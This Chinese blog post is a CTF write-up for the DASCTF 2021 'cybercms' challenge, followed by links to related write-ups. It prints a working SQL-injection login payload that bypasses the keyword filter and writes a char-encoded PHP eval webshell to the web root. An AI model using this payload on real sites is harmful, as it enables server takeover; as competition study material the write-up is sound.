cybercms

最新推荐文章于 2022-05-05 18:44:56 发布
最新推荐文章于 2022-05-05 18:44:56 发布
阅读量131 收藏
点赞数
分类专栏: 2021DASCTF July X CBCTF WP 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lastwinn/article/details/119303589
版权

cybercms

第一步还是先找后台,后台在admin/

/admin/login.php

尝试一波密码发现进不去,

试试admin'发现报错

然后发现有www.zip 备份文件。

对登录框进行了过滤,这边绕了蛮久就不一一写了,直接上payload

最终payload:
url:http://67fa4a9d-62c0-45c9-8233-005c57ec0a7d.node4.buuoj.cn/admin/login.php?action=ck_login
​
user=admin%27/**/union/**/selselectect/**/1,2,3,4,char(60,63,112,104,112,32,64,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,59,63,62)/**/into/**/outoutfilefile/**/'/var/www/html/shell1.php'#&password=1&code=&submit=true&submit.x=39&submit.y=34

创建一个一句话木马

为这个页面就成功了,访问该页面,成功写入。

 

 

 

 

angelkat
关注
专栏目录
DASCTF&BJDCTF 3rd 三道PWN题复现
weixin_44145820的博客
06-21 905
最近看了一下上次安恒五月赛没做出的几道PWN题,感觉自己水平还是不够,还要多学习 easybabystack(格式化字符串*, ret2csu) 这题有个栈溢出漏洞 但是必须输入正确的密码,否则就直接退出了 还有个格式化字符串漏洞 字符串长度为12 由于密码是/dev/urandom生成的,无法预测。 这里需要利用格式化字符串漏洞的’*'号 %*num$d从栈中取变量作为N 比如num$处的值是0x100,那么这个格式化字符串就相当于%256d 而密码位于18$的位置,我们使用%*18$c就可以打
【CTF大赛】2021 DASCTF July cybercms 一探再探
HBohan的博客
08-28 664
引言 在前不久结束的 2021 DASCTF July X CBCTF 4th 比赛中,有一道名为 cybercms 的 web 题目。 预期解是从后台登录处进行 SQL 注入写入一句话木马,然而咱在做题的时候尝试了另一种思路,用的是后台登录绕过 & 木马上传的打法。 由于比赛的时候半天打不通就十分难受,赛后还是想不明白就来稍微深入探究了一下,经过曲折最后终于成功打通了。 这篇就来记录一下做这道题时候的心路历程吧…… 题目初探 cybercms 赛博CMS,只为安全而生 Hint: 信息搜集是一个
DASCTF July X CBCTF2021 cybercms WP
weixin_48083470的博客
08-02 276
DASCTF July X CBCTF cybercms 是一个cms网站 常规扫面后台文件 扫到一个后台登录网页,这个cms请求量大了后还是会503,403的,不过这个admin也没有多难猜 登录测试 输入点号 发现可以报错 同时尝试/www.zip可以下载源码 这里会对用户名和密码进行过滤,有两个函数, 第一个,过滤了一些内容 会替换为空,那么双写绕过即可 function fl_value($str){ if(empty($str)){return;} return preg_replace
CMS 内容管理系统
weixin_30537391的博客
06-16 1854
http://www.codeplex.com/n2 N2是一个基于Asp.net的内容管理系统 此外,其他的CMS系统也很多 http://ssmax.net/archives/212.html 文章的介绍 先看看国内的: TurboCMS动易内容管理系统帝国网站管理系统 ECMSSupeSite 社区门户系统COMSHARP CMS - 锐商企业CMSphpcms 网站管理系统dedecms...
2022DASCTF Apr X FATE 防疫挑战赛web复现
qq_58970968的博客
05-05 271
打开可看到是代码审计,现在的我的水平显然不会做: 所以参考了其他师父的wp;勉勉强强知道点流程,大概就是不断调用各种类中的方法; 首先拿到四个代码,如下: Base.php <?php class Base { public function __get($name) { $getter = 'get' . $name; if (method_exists($this, $getter)) { return $t
2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th -- WP [pwn]
lifanxin的博客
08-03 1355
WP概述EasyHeaprealNoOutputold_thing总结 概述   前天又参加了一次激动人心的比赛,好吧,确实只能说是激动人心,毕竟没有物质回报,好的名次和中将名额总是和自己无缘。废话不多说,直接看wp。   所有题目和环境都在buuoj上有复现,这里感谢buuoj在我学习ctf过程中提供的做题环境以及时不时搞几场比赛来激励(打击/(ㄒoㄒ)/~~)我努力学习。 EasyHeap   题目是常规的堆题,64位程序,保护全开,漏洞也算明显,当然对strdup函数功能不熟悉的同学可能需要调试后才能
中软国际e-Park数字化园区综合解决方案
07-09
电子政务方面,中软国际运用其CyberCMS内容管理中间件进行信息发布,采用UWF工作流中间件支持内部办公自动化,以及CRM客户关系系统满足招商管理需求。同时,基于一站式服务的网上申报审批系统和基于GIS的智能化城市...
【2022DASCTF X SU】 三月春季挑战赛 web复现
errorr0
04-20 1574
DASCTF
2022HWS硬件安全冬令营 X DASCTF Jan部分wp
weixin_52829570的博客
01-25 3519
Misc gogogo 下载解压得到两个文件夹,一个是一堆拼图,一个是raw文件所以进行拼图和取证 取证步骤 上来先看imageinfo python2 vol.py -f 2.raw imageinfo 看下桌面 python2 vol.py -f 2.raw --profile=WinXPSP2x86 filescan | grep "桌面" 发现有个zip文件,导出zip文件 python2 vol.py -f 2.raw dumpfiles -Q 0x00000000..
DASCTF Sept X 浙江工业大学秋季挑战赛 部分wp
Airwooh的博客
09-25 1670
排名28,还是太菜了,web就出了一道,eur1ka yyds MISC Girlfriend’s account import re import xlrd data=xlrd.open_workbook("D:\webtest\information.xls") table = data.sheets()[0] nrows = table.nrows price=table.col_values(0, start_rowx=1, end_rowx=5001) number=table.col.
DASCTF x SU 三月wp+复现
一只菜鸡
03-30 634
之前给忘了 已经搭建新站很久了~ 师傅们来找我玩呀 因为还没复现完就先放这里了 复现完再放新站 ezpop 直接得到源码: <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->.
2022DASCTF Apr X FATE 防疫挑战赛 部分web复现
errorr0
04-28 1699
DAS的部分web复现
[Misc]2022DASCTF Apr X FATE 防疫挑战赛 wp
mumuzi的博客
04-24 4532
das4
2020 DASCTF&BJD 部分题解
yemeinanhai的博客
12-26 3718
呜呜圣诞节还要打比赛我太难了,但结果还不错的样子~ 没有0解 拿了FakePic的一血 混进了前四十有电子证书(呜呜,学到现在终于要有证书了) 下面就是WP了 Misc 马老师的秘籍 下载得到一张全是二维码的图片,扫描了几个发现每个二维码都是马老师经典语录中的3个字,没发现什么有用的信息。怀疑要么flag在其中的几张二维码里,要么是全部扫出来连起来是密文,然后卡了好久…过了半小时,才想起来misc拿到图片不应该先看看是不是可以分离吗… 于是binwalk一番发现含有zip,用fore
[WP/BUU/CTF]Cookie Store 题解
車鈊的博客
07-31 470
简单题,涉及Cookie的使用方法 存储-Cookie-session-值 base64解码 eyJtb25leSI6IDUwLCAiaGlzdG9yeSI6IFtdfQ== // 解码 {"money": 50, "history": []} 后台通过base64存储用户信息,是及其危险的,可以伪造数据 {"money": 100, "history": []} // 编码 eyJtb25leSI6IDEwMCwgImhpc3RvcnkiOiBbXX0= 替换Value,刷新,购买flag即可 ..
2020祥云杯
Stella_Leo的博客
08-25 512
2020-祥云杯 好久都没有刷过ctf的题目了,找了个比赛来复现练练手,选了祥云杯2020,下一步准备做DASCTF月赛。 记录一个github项目,题目超多!!! https://github.com/fghcvjk/2020xiangyuncup 准备是misc pwn re 和 crypto全做。web看看… crypto量力而行吧。。毕竟我比较菜。 MISC 签到 ZmxhZ3txcV9ncm91cF84MjY1NjYwNDB9 base64解码flag{qq_group_826566040} 进制
2021年四川省大学生信息安全技术大赛部分WP (四川省赛WP)
mumuzi的博客
09-06 3206
稍微有点阴间,但是血加成还是舒服 比如misc 500分的那个最后的部分、还有每道题的提交格式,嗐。 EasyWeb 第一个问问的是$fir == md5($fir) 弱比较,会把字符串类型转化成相同的,再进行比较。 绕过只需要找一个0e开头的并且md5之后也是0e开头,公网电脑一搜即可 payload:10.1.117.1:20000/?fir=0e215962017 回显得到TheFlagFi1e.php,访问之后发现叫输入password,查看源码说“md5加密,很安全” 依旧搜了之后发现,“ff
Dasctf web 2道题的wp
Airwooh的博客
08-02 408
就出了两道web 太菜了 总排名44 eur1ka yyds web1 Google 搜了一下 是前几天爆出的一个洞 直接打就出来了 web2 <?php if (isset($_GET['cmd'])) { $cmd = $_GET['cmd']; if (!preg_match('/flag/i',$cmd)) { $cmd = escapeshellarg($cmd); system('cat ' . $cmd); .
漏洞分析 | WP Super Cache远程代码执行漏洞分析
爱国小白帽
03-31 687
0x01 WP Super Cache 介绍 WP Super Cache是WordPress的一个插件,主要用来缓存加速网页数据的。 笔者发现管理后台再向缓存配置文件写入数据时过滤不严谨导致可以植入恶意代码,进而导致远程代码执行。WordPress官方已经在最新版1.7.2中修复了此漏洞。 受影响版本:<= 1.7.1 0x02 漏洞复现 首先登陆管理后台,找到WP Super Cache的设置页面,通常URL为**/wp-admin/options-general.php?page=wpsupe.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值